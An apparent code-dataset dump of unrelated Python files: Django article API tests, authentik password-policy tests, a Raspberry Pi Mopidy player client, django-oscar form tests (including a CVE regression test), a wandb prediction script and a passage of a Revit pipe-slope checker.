self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_access_single_article(self):
"""This method checks if a user can access a single article"""
url = self.single_article_details()
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_user_cannot_create_without_title(self):
"""This method tests if a user can post without a title"""
self.article['article'].pop('title')
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_update(self):
"""This method checks if a user can update an existing articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {slug: 'slug'})
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json', HTTP_AUTHORIZATION=token)
self.assertIn("Updated Title", json.dumps(r.data))
self.assertEqual(r.status_code, status.HTTP_200_OK)
def test_unauthorised_user_update(self):
"""This method tests if unauthorized user can update existing articles"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
r = self.client.put(url, data={"article": {"title": "Updated Title", "body": "Updated body"}}, format='json')
self.assertEqual(r.status_code, status.HTTP_403_FORBIDDEN)
def test_user_can_delete(self):
"""This method tests if a user can delete articles"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format='json', HTTP_AUTHORIZATION=token)
slug = response.data['slug']
url = API_Reverse('articles:article-details', {slug: 'slug'})
r = self.client.delete(url, format='json', HTTP_AUTHORIZATION=token)
self.assertEqual(r.status_code, status.HTTP_200_OK)
self.assertIn("Article Deleted Successfully", json.dumps(r.data))
def test_unauthorised_user_delete(self):
"""This method tests if a non owner can delete an article"""
url = self.single_article_details()
self.client.credentials(HTTP_AUTHORIZATION='')
response = self.client.delete(url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_article_returns_url(self):
"""This method tests whether the API returns url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("url", json.dumps(response.data))
def test_if_article_returns_facebook_url(self):
"""This method tests whether the API returns facebook url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("facebook", json.dumps(response.data))
def test_if_article_returns_linkedin_url(self):
"""This method tests whether the API returns linkedin url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("Linkedin", json.dumps(response.data))
def test_if_article_returns_twitter_url(self):
"""This method tests whether the API returns twitter url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("twitter", json.dumps(response.data))
def test_if_article_returns_mail_url(self):
"""This method tests whether the API returns mail url"""
self.create_user()
self.activate_user()
token = self.login_user()
response = self.client.post(self.url, self.article, format="json", HTTP_AUTHORIZATION=token)
self.assertIn("mail", json.dumps(response.data)) | 0.55652 | 0.180594 |
from django.test import TestCase
from guardian.shortcuts import get_anonymous_user
from authentik.lib.generators import generate_key
from authentik.policies.password.models import PasswordPolicy
from authentik.policies.types import PolicyRequest, PolicyResult
class TestPasswordPolicy(TestCase):
"""Test Password Policy"""
def setUp(self) -> None:
self.policy = PasswordPolicy.objects.create(
name="test_false",
amount_digits=1,
amount_uppercase=1,
amount_lowercase=2,
amount_symbols=3,
length_min=24,
error_message="test message",
)
def test_invalid(self):
"""Test without password"""
request = PolicyRequest(get_anonymous_user())
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages[0], "Password not set in context")
def test_failed_length(self):
"""Password too short"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_lowercase(self):
"""not enough lowercase"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_uppercase(self):
"""not enough uppercase"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_symbols(self):
"""not enough symbols"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_digits(self):
"""not enough digits"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_true(self):
"""Positive password case"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = <PASSWORD>_key() + "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertTrue(result.passing)
self.assertEqual(result.messages, tuple()) | authentik/policies/password/tests/test_policy.py | from django.test import TestCase
from guardian.shortcuts import get_anonymous_user
from authentik.lib.generators import generate_key
from authentik.policies.password.models import PasswordPolicy
from authentik.policies.types import PolicyRequest, PolicyResult
class TestPasswordPolicy(TestCase):
"""Test Password Policy"""
def setUp(self) -> None:
self.policy = PasswordPolicy.objects.create(
name="test_false",
amount_digits=1,
amount_uppercase=1,
amount_lowercase=2,
amount_symbols=3,
length_min=24,
error_message="test message",
)
def test_invalid(self):
"""Test without password"""
request = PolicyRequest(get_anonymous_user())
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages[0], "Password not set in context")
def test_failed_length(self):
"""Password too short"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_lowercase(self):
"""not enough lowercase"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_uppercase(self):
"""not enough uppercase"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_symbols(self):
"""not enough symbols"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_failed_digits(self):
"""not enough digits"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertFalse(result.passing)
self.assertEqual(result.messages, ("test message",))
def test_true(self):
"""Positive password case"""
request = PolicyRequest(get_anonymous_user())
request.context["password"] = <PASSWORD>_key() + "<PASSWORD>!!!" # nosec
result: PolicyResult = self.policy.passes(request)
self.assertTrue(result.passing)
self.assertEqual(result.messages, tuple()) | 0.500244 | 0.315532 |
from mpd import MPDClient
from MopidyConfig import MopidyConfig
import RPi.GPIO as gpio
import os.path
import time
import json
import logging
import threading
RED = [True, False, False]
GREEN = [False, True, False]
BLUE = [False, False, True]
YELLOW = [True, True, False]
WHITE = [True, True, True]
class MopidyClient(MopidyConfig):
_red_led = 25
_green_led = 23
_blue_led = 24
def __init__(self):
self._client = None
self._currentPlaylistId = ""
self._currentPlaylistName = ""
self._stateFileContent = { 'playlistId': '', 'track': 0, 'time': 0 }
self.initRgbLed()
self.loadStateFile()
def initRgbLed(self):
gpio.setmode(gpio.BCM)
gpio.setup(self._red_led, gpio.OUT)
gpio.setup(self._green_led, gpio.OUT)
gpio.setup(self._blue_led, gpio.OUT)
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def led_on(self, color):
if color[0]:
gpio.output(self._red_led, gpio.HIGH)
if color[1]:
gpio.output(self._green_led, gpio.HIGH)
if color[2]:
gpio.output(self._blue_led, gpio.HIGH)
def led_off(self):
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def connect(self):
try:
if self._client == None:
self._client = MPDClient()
self._client.timeout = 60
self._client.idletimeout = None
self._client.connect("localhost", 6600)
except Exception as e:
print("ERROR1: " + str(e))
def disconnect(self):
try:
if self._client != None:
self._client.close()
self._client.disconnect()
except Exception as e:
print("ERROR2: " + str(e))
self._client = None
def updateStatus(self):
result = {}
try:
self.connect()
result["playlistId"] = self._currentPlaylistId
result["playlistName"] = self._currentPlaylistName.replace("[USB] ", "")
status = self._client.status()
result["tracks"] = int(status["playlistlength"])
result["state"] = status["state"]
if "song" in status:
result["track"] = int(status["song"])
result["time"] = float(status.get('elapsed', 0.0))
curr = self._client.currentsong()
result["duration"] = float(curr["time"])
result["album"] = curr.get("album", "").strip()
result["artist"] = curr.get("artist", "").strip()
result["title"] = curr.get("title", "").strip()
if (result["track"] == result["tracks"] - 1) and (result["duration"] - result["time"] < 5):
self.updateStateFileContent(self._currentPlaylistId, 0, 0)
else:
self.updateStateFileContent(self._currentPlaylistId, int(status["song"]), float(status.get('elapsed', 0.0)))
except Exception as e:
print("ERROR3: " + str(e))
result["error"] = str(e)
return result
def stop(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play' or state == 'pause':
self._client.stop()
except Exception as e:
print("ERROR4: " + str(e))
def togglePlayPause(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play':
self._client.pause(1)
elif state == 'pause':
self._client.pause(0)
else:
self._client.play(0)
except Exception as e:
print("ERROR5: " + str(e))
def skipToTrack(self, track):
try:
self.connect()
status = self._client.status()
tracks = int(status["playlistlength"])
if tracks > 0:
track = max(0, min(track, tracks - 1))
self._client.play(track)
except Exception as e:
print("ERROR6: " + str(e))
def skipToNextTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
if "nextsong" in status and "song" in status:
tracks = int(status["playlistlength"])
track = int(status["song"]) + count
track = min(track, tracks - 1)
self._client.play(track)
else:
self.seek(count * 60)
except Exception as e:
print("ERROR7: " + str(e))
def skipToPreviousTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
currentTrack = int(status.get("song", "-1"))
if currentTrack > 0:
track = max(0, currentTrack - count)
self._client.play(track)
else:
self.seek(count * -60)
except Exception as e:
print("ERROR8: " + str(e))
def skipToStart(self):
try:
self.connect()
status = self._client.status()
if int(status["playlistlength"]) > 0:
self._client.play(0)
except Exception as e:
print("ERROR9: " + str(e))
def seek(self, deltaInSeconds):
try:
self.connect()
if self._client.status()['state'] == 'stop':
return
if deltaInSeconds > 0:
status = self._client.status()
if "nextsong" not in status:
currentTrack = int(status.get("song", "-1"))
if currentTrack > -1:
currentTrackTime = int(round(float(status.get('elapsed', 0.0))))
currentTrackDuration = int(self._client.playlistinfo()[currentTrack]['time'])
if currentTrackTime + deltaInSeconds >= currentTrackDuration - 1:
return
self._client.seekcur("+" + str(deltaInSeconds))
else:
self._client.seekcur(str(deltaInSeconds))
except Exception as e:
print("ERROR10: " + str(e))
def loadPlaylist(self, id):
if self._currentPlaylistId == id and (id == "" or self._currentPlaylistName != ""):
return
newId = self._currentPlaylistId != id and self._currentPlaylistId != ""
self._currentPlaylistId = id
prevPlaylistName = self._currentPlaylistName
self._currentPlaylistName = ""
try:
self.connect()
if prevPlaylistName != "":
self._client.clear()
if id != "":
playlists = self._client.listplaylists()
selectedPlaylist = next((p for p in playlists if p["playlist"].find(id) > -1), None)
if selectedPlaylist != None:
self.led_on(GREEN)
self._currentPlaylistName = selectedPlaylist["playlist"]
self._client.clear()
self._client.load(selectedPlaylist["playlist"])
if self._stateFileContent.get("playlistId", "") == id:
track = self._stateFileContent.get("track", 0)
self._client.play(track)
if float(self._stateFileContent.get("time", 0)) > 5:
self._client.pause(1)
time.sleep(1) #hack
self._client.seek(track, str(self._stateFileContent.get("time", 0)))
self._client.pause(0)
else:
self._client.play(0)
elif newId:
self.led_on(RED)
except Exception as e:
print("ERROR11: " + str(e))
self.led_on(YELLOW)
time.sleep(1)
self.led_off()
def loadStateFile(self):
for i in range(2):
fname = 'state{0}.json'.format(i)
try:
if os.path.isfile(fname):
with open(fname, 'r') as f:
self._stateFileContent = json.load(f)
return
except Exception as e:
print("ERROR12: " + str(e))
def updateStateFileContent(self, playlistId, track, time):
if playlistId == "" or playlistId == None:
return
trackChanged = playlistId != self._stateFileContent.get("playlistId", "") or track != self._stateFileContent.get("track", 0)
timeChanged = time != self._stateFileContent["time"]
if trackChanged or int(time) % 5 == 0:
self._stateFileContent["playlistId"] = playlistId
self._stateFileContent["track"] = track
self._stateFileContent["time"] = time
if trackChanged or (timeChanged and int(time) % 60 == 0):
self.saveStateFile()
def saveStateFile(self):
for i in range(2):
try:
fname = 'state{0}.json'.format(i)
with open(fname, 'w') as f:
json.dump(self._stateFileContent, f)
except Exception as e:
print("ERROR13: " + str(e)) | MopidyClient.py | from mpd import MPDClient
from MopidyConfig import MopidyConfig
import RPi.GPIO as gpio
import os.path
import time
import json
import logging
import threading
RED = [True, False, False]
GREEN = [False, True, False]
BLUE = [False, False, True]
YELLOW = [True, True, False]
WHITE = [True, True, True]
class MopidyClient(MopidyConfig):
_red_led = 25
_green_led = 23
_blue_led = 24
def __init__(self):
self._client = None
self._currentPlaylistId = ""
self._currentPlaylistName = ""
self._stateFileContent = { 'playlistId': '', 'track': 0, 'time': 0 }
self.initRgbLed()
self.loadStateFile()
def initRgbLed(self):
gpio.setmode(gpio.BCM)
gpio.setup(self._red_led, gpio.OUT)
gpio.setup(self._green_led, gpio.OUT)
gpio.setup(self._blue_led, gpio.OUT)
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def led_on(self, color):
if color[0]:
gpio.output(self._red_led, gpio.HIGH)
if color[1]:
gpio.output(self._green_led, gpio.HIGH)
if color[2]:
gpio.output(self._blue_led, gpio.HIGH)
def led_off(self):
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def connect(self):
try:
if self._client == None:
self._client = MPDClient()
self._client.timeout = 60
self._client.idletimeout = None
self._client.connect("localhost", 6600)
except Exception as e:
print("ERROR1: " + str(e))
def disconnect(self):
try:
if self._client != None:
self._client.close()
self._client.disconnect()
except Exception as e:
print("ERROR2: " + str(e))
self._client = None
def updateStatus(self):
result = {}
try:
self.connect()
result["playlistId"] = self._currentPlaylistId
result["playlistName"] = self._currentPlaylistName.replace("[USB] ", "")
status = self._client.status()
result["tracks"] = int(status["playlistlength"])
result["state"] = status["state"]
if "song" in status:
result["track"] = int(status["song"])
result["time"] = float(status.get('elapsed', 0.0))
curr = self._client.currentsong()
result["duration"] = float(curr["time"])
result["album"] = curr.get("album", "").strip()
result["artist"] = curr.get("artist", "").strip()
result["title"] = curr.get("title", "").strip()
if (result["track"] == result["tracks"] - 1) and (result["duration"] - result["time"] < 5):
self.updateStateFileContent(self._currentPlaylistId, 0, 0)
else:
self.updateStateFileContent(self._currentPlaylistId, int(status["song"]), float(status.get('elapsed', 0.0)))
except Exception as e:
print("ERROR3: " + str(e))
result["error"] = str(e)
return result
def stop(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play' or state == 'pause':
self._client.stop()
except Exception as e:
print("ERROR4: " + str(e))
def togglePlayPause(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play':
self._client.pause(1)
elif state == 'pause':
self._client.pause(0)
else:
self._client.play(0)
except Exception as e:
print("ERROR5: " + str(e))
def skipToTrack(self, track):
try:
self.connect()
status = self._client.status()
tracks = int(status["playlistlength"])
if tracks > 0:
track = max(0, min(track, tracks - 1))
self._client.play(track)
except Exception as e:
print("ERROR6: " + str(e))
def skipToNextTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
if "nextsong" in status and "song" in status:
tracks = int(status["playlistlength"])
track = int(status["song"]) + count
track = min(track, tracks - 1)
self._client.play(track)
else:
self.seek(count * 60)
except Exception as e:
print("ERROR7: " + str(e))
def skipToPreviousTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
currentTrack = int(status.get("song", "-1"))
if currentTrack > 0:
track = max(0, currentTrack - count)
self._client.play(track)
else:
self.seek(count * -60)
except Exception as e:
print("ERROR8: " + str(e))
def skipToStart(self):
try:
self.connect()
status = self._client.status()
if int(status["playlistlength"]) > 0:
self._client.play(0)
except Exception as e:
print("ERROR9: " + str(e))
def seek(self, deltaInSeconds):
try:
self.connect()
if self._client.status()['state'] == 'stop':
return
if deltaInSeconds > 0:
status = self._client.status()
if "nextsong" not in status:
currentTrack = int(status.get("song", "-1"))
if currentTrack > -1:
currentTrackTime = int(round(float(status.get('elapsed', 0.0))))
currentTrackDuration = int(self._client.playlistinfo()[currentTrack]['time'])
if currentTrackTime + deltaInSeconds >= currentTrackDuration - 1:
return
self._client.seekcur("+" + str(deltaInSeconds))
else:
self._client.seekcur(str(deltaInSeconds))
except Exception as e:
print("ERROR10: " + str(e))
def loadPlaylist(self, id):
if self._currentPlaylistId == id and (id == "" or self._currentPlaylistName != ""):
return
newId = self._currentPlaylistId != id and self._currentPlaylistId != ""
self._currentPlaylistId = id
prevPlaylistName = self._currentPlaylistName
self._currentPlaylistName = ""
try:
self.connect()
if prevPlaylistName != "":
self._client.clear()
if id != "":
playlists = self._client.listplaylists()
selectedPlaylist = next((p for p in playlists if p["playlist"].find(id) > -1), None)
if selectedPlaylist != None:
self.led_on(GREEN)
self._currentPlaylistName = selectedPlaylist["playlist"]
self._client.clear()
self._client.load(selectedPlaylist["playlist"])
if self._stateFileContent.get("playlistId", "") == id:
track = self._stateFileContent.get("track", 0)
self._client.play(track)
if float(self._stateFileContent.get("time", 0)) > 5:
self._client.pause(1)
time.sleep(1) #hack
self._client.seek(track, str(self._stateFileContent.get("time", 0)))
self._client.pause(0)
else:
self._client.play(0)
elif newId:
self.led_on(RED)
except Exception as e:
print("ERROR11: " + str(e))
self.led_on(YELLOW)
time.sleep(1)
self.led_off()
def loadStateFile(self):
for i in range(2):
fname = 'state{0}.json'.format(i)
try:
if os.path.isfile(fname):
with open(fname, 'r') as f:
self._stateFileContent = json.load(f)
return
except Exception as e:
print("ERROR12: " + str(e))
def updateStateFileContent(self, playlistId, track, time):
if playlistId == "" or playlistId == None:
return
trackChanged = playlistId != self._stateFileContent.get("playlistId", "") or track != self._stateFileContent.get("track", 0)
timeChanged = time != self._stateFileContent["time"]
if trackChanged or int(time) % 5 == 0:
self._stateFileContent["playlistId"] = playlistId
self._stateFileContent["track"] = track
self._stateFileContent["time"] = time
if trackChanged or (timeChanged and int(time) % 60 == 0):
self.saveStateFile()
def saveStateFile(self):
for i in range(2):
try:
fname = 'state{0}.json'.format(i)
with open(fname, 'w') as f:
json.dump(self._stateFileContent, f)
except Exception as e:
print("ERROR13: " + str(e)) | 0.121204 | 0.055132 |
from datetime import date, datetime
from unittest import mock
import pytz
from django.conf import settings
from django.core import mail
from django.core.exceptions import ValidationError
from django.test import TestCase, override_settings
from oscar.apps.customer.forms import (
EmailUserCreationForm, OrderSearchForm, PasswordResetForm)
from oscar.test.factories import UserFactory
class TestEmailUserCreationForm(TestCase):
@mock.patch('oscar.apps.customer.forms.validate_password')
def test_validator_passed_populated_user(self, mocked_validate):
mocked_validate.side_effect = ValidationError('That password is rubbish')
form = EmailUserCreationForm(data={'email': '<EMAIL>', 'password1': '<PASSWORD>', 'password2': '<PASSWORD>'})
self.assertFalse(form.is_valid())
mocked_validate.assert_called_once_with('terry', form.instance)
self.assertEqual(mocked_validate.call_args[0][1].email, '<EMAIL>')
self.assertEqual(form.errors['password2'], ['That password is rubbish'])
class TestPasswordResetForm(TestCase):
def test_user_email_unicode_collision(self):
# Regression test for CVE-2019-19844, which Oscar's PasswordResetForm
# was vulnerable to because it had overridden the save() method.
UserFactory(username='mike123', email='<EMAIL>')
UserFactory(username='mike456', email='<EMAIL>')
form = PasswordResetForm({'email': '<EMAIL>'})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, ['<EMAIL>'])
class TestOrderSearchForm(TestCase):
@override_settings(TIME_ZONE='Africa/Nairobi')
def test_get_filters(self):
form = OrderSearchForm(data={
'date_from': date(2021, 1, 1),
'date_to': date(2021, 1, 10),
'order_number': '100'
})
self.assertTrue(form.is_valid())
filters = form.get_filters()
nbi = pytz.timezone(settings.TIME_ZONE)
self.assertEqual(filters, {
'date_placed__gte': nbi.localize(datetime(2021, 1, 1)),
'date_placed__lte': nbi.localize(datetime(2021, 1, 10, 23, 59, 59, 999999)),
'number__contains': '100',
}) | tests/unit/customer/test_forms.py | from datetime import date, datetime
from unittest import mock
import pytz
from django.conf import settings
from django.core import mail
from django.core.exceptions import ValidationError
from django.test import TestCase, override_settings
from oscar.apps.customer.forms import (
EmailUserCreationForm, OrderSearchForm, PasswordResetForm)
from oscar.test.factories import UserFactory
class TestEmailUserCreationForm(TestCase):
@mock.patch('oscar.apps.customer.forms.validate_password')
def test_validator_passed_populated_user(self, mocked_validate):
mocked_validate.side_effect = ValidationError('That password is rubbish')
form = EmailUserCreationForm(data={'email': '<EMAIL>', 'password1': '<PASSWORD>', 'password2': '<PASSWORD>'})
self.assertFalse(form.is_valid())
mocked_validate.assert_called_once_with('terry', form.instance)
self.assertEqual(mocked_validate.call_args[0][1].email, '<EMAIL>')
self.assertEqual(form.errors['password2'], ['That password is rubbish'])
class TestPasswordResetForm(TestCase):
def test_user_email_unicode_collision(self):
# Regression test for CVE-2019-19844, which Oscar's PasswordResetForm
# was vulnerable to because it had overridden the save() method.
UserFactory(username='mike123', email='<EMAIL>')
UserFactory(username='mike456', email='<EMAIL>')
form = PasswordResetForm({'email': '<EMAIL>'})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, ['<EMAIL>'])
class TestOrderSearchForm(TestCase):
@override_settings(TIME_ZONE='Africa/Nairobi')
def test_get_filters(self):
form = OrderSearchForm(data={
'date_from': date(2021, 1, 1),
'date_to': date(2021, 1, 10),
'order_number': '100'
})
self.assertTrue(form.is_valid())
filters = form.get_filters()
nbi = pytz.timezone(settings.TIME_ZONE)
self.assertEqual(filters, {
'date_placed__gte': nbi.localize(datetime(2021, 1, 1)),
'date_placed__lte': nbi.localize(datetime(2021, 1, 10, 23, 59, 59, 999999)),
'number__contains': '100',
}) | 0.557845 | 0.262777 |
import wandb
from src.Data import Data
from src.configurations import Configuration, WandbLogs
from src.models.BestPreTrainedModelForAStation import BestPreTrainedModelForAStation
from src.models.PerStationModel import PerStationModel
from src.run_utils import LogKeys, train_predict_evaluate_log_for_model_and_data
def run(config: Configuration = Configuration()):
wandb_run = wandb.init(project=config.wandb_project_name,
entity=config.wandb_entity,
mode=config.wandb_mode,
notes="Best trained model",
tags=['Best trained model', 'model per station'],
config=config.as_dict())
# Reload the Configuration (to allow for sweeps)
configuration = Configuration(**wandb.config)
# Load training and validation data
training_dev_data = Data(config.no_nan_in_bikes, config.development_data_path + config.dev_data_filename)
val_data = Data(config.no_nan_in_bikes, config.development_data_path + config.val_data_filename)
# Model
per_station_model = PerStationModel(configuration, training_dev_data, BestPreTrainedModelForAStation, True)
log_keys = {LogKeys.mae_dev.value: WandbLogs.per_station_mae_dev.value,
LogKeys.mae_val.value: WandbLogs.per_station_mae_val.value,
LogKeys.mae_per_station_dev.value: WandbLogs.per_station_mae_per_station_dev.value,
LogKeys.mae_per_station_val.value: WandbLogs.per_station_mae_per_station_val.value,
LogKeys.predictions_dev.value: WandbLogs.per_station_predictions_dev.value,
LogKeys.predictions_val.value: WandbLogs.per_station_predictions_val.value,
}
train_predict_evaluate_log_for_model_and_data(per_station_model, training_dev_data, val_data,
log_keys, wandb_run, configuration.log_predictions_to_wandb)
# Write predictions to csv
if configuration.run_test_predictions:
test_data = Data(config.no_nan_in_bikes, config.test_data_path)
if configuration.run_test_predictions:
per_station_result_test = per_station_model.predict(test_data)
per_station_result_test.write_to_csv('per_station_model_' + wandb_run.name, configuration)
def main():
run(Configuration())
if __name__ == "__main__":
main() | src/predict_using_trained_models.py | import wandb
from src.Data import Data
from src.configurations import Configuration, WandbLogs
from src.models.BestPreTrainedModelForAStation import BestPreTrainedModelForAStation
from src.models.PerStationModel import PerStationModel
from src.run_utils import LogKeys, train_predict_evaluate_log_for_model_and_data
def run(config: Configuration = Configuration()):
wandb_run = wandb.init(project=config.wandb_project_name,
entity=config.wandb_entity,
mode=config.wandb_mode,
notes="Best trained model",
tags=['Best trained model', 'model per station'],
config=config.as_dict())
# Reload the Configuration (to allow for sweeps)
configuration = Configuration(**wandb.config)
# Load training and validation data
training_dev_data = Data(config.no_nan_in_bikes, config.development_data_path + config.dev_data_filename)
val_data = Data(config.no_nan_in_bikes, config.development_data_path + config.val_data_filename)
# Model
per_station_model = PerStationModel(configuration, training_dev_data, BestPreTrainedModelForAStation, True)
log_keys = {LogKeys.mae_dev.value: WandbLogs.per_station_mae_dev.value,
LogKeys.mae_val.value: WandbLogs.per_station_mae_val.value,
LogKeys.mae_per_station_dev.value: WandbLogs.per_station_mae_per_station_dev.value,
LogKeys.mae_per_station_val.value: WandbLogs.per_station_mae_per_station_val.value,
LogKeys.predictions_dev.value: WandbLogs.per_station_predictions_dev.value,
LogKeys.predictions_val.value: WandbLogs.per_station_predictions_val.value,
}
train_predict_evaluate_log_for_model_and_data(per_station_model, training_dev_data, val_data,
log_keys, wandb_run, configuration.log_predictions_to_wandb)
# Write predictions to csv
if configuration.run_test_predictions:
test_data = Data(config.no_nan_in_bikes, config.test_data_path)
if configuration.run_test_predictions:
per_station_result_test = per_station_model.predict(test_data)
per_station_result_test.write_to_csv('per_station_model_' + wandb_run.name, configuration)
def main():
run(Configuration())
if __name__ == "__main__":
main() | 0.641085 | 0.479382 |
import sys
import ConfigParser
from os.path import expanduser
# Set system path
home = expanduser("~")
cfgfile = open(home + "\\STVTools.ini", 'r')
config = ConfigParser.ConfigParser()
config.read(home + "\\STVTools.ini")
# Master Path
syspath1 = config.get('SysDir','MasterPackage')
sys.path.append(syspath1)
# Built Path
syspath2 = config.get('SysDir','SecondaryPackage')
sys.path.append(syspath2)
import clr, Selection
clr.AddReference('RevitAPI')
clr.AddReference('RevitAPIUI')
clr.AddReference("System")
clr. AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
from Autodesk.Revit.UI import TaskDialog, TaskDialogCommonButtons, TaskDialogResult
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document
from pyrevit import script
__doc__ = 'Print all the irregular pipe slopes and element id in selection'\
'Tolerance at 0.001 ' \
'clear list 12/12, 0.5/12, 0.25/12, 0.125/12, 0.0625/12'
def isclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
def isnotclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
return abs(a-b) >= max(rel_tol * max(abs(a), abs(b)), abs_tol)
sel_element = Selection.get_selected_elements(doc)
if len(sel_element) == 0:
TaskDialog.Show('Warning', 'Please make selection first')
else:
outprint = script.get_output()
pipes = []
for i in sel_element:
if i.Category.Name == 'Pipes':
pipes.append(i)
print('Found ' + str(len(pipes)) + ' pipes')
# pipes = FilteredElementCollector(doc).OfClass(Pipe).ToElements()
for p in pipes:
slope = p.LookupParameter('Slope').AsDouble()
if slope != 0.0 and slope < 1.1 and isnotclose(slope, 12/12)and isnotclose(slope, 0.5/12) and isnotclose(slope, 0.25/12)\
and isnotclose(slope, 0.125/12) and isnotclose(slope, 0.0625/12):
print(format(outprint.linkify(p.Id))+ ' SLOPE: ' + str(slope*12) + '/foot')
print('End') | CustomExtension.extension/STVTools.tab/MEP Tools.panel/Tools.stack3/Slope.pulldown/irregular.pushbutton/script.py | import sys
import ConfigParser
from os.path import expanduser
# Set system path
home = expanduser("~")
cfgfile = open(home + "\\STVTools.ini", 'r')
config = ConfigParser.ConfigParser()
config.read(home + "\\STVTools.ini")
# Master Path
syspath1 = config.get('SysDir','MasterPackage')
sys.path.append(syspath1)
# Built Path
syspath2 = config.get('SysDir','SecondaryPackage')
sys.path.append(syspath2)
import clr, Selection
clr.AddReference('RevitAPI')
clr.AddReference('RevitAPIUI')
clr.AddReference("System")
clr. AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
from Autodesk.Revit.UI import TaskDialog, TaskDialogCommonButtons, TaskDialogResult
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document
from pyrevit import script
__doc__ = 'Print all the irregular pipe slopes and element id in selection'\
'Tolerance at 0.001 ' \
'clear list 12/12, 0.5/12, 0.25/12, 0.125/12, 0.0625/12'
def isclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
def isnotclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
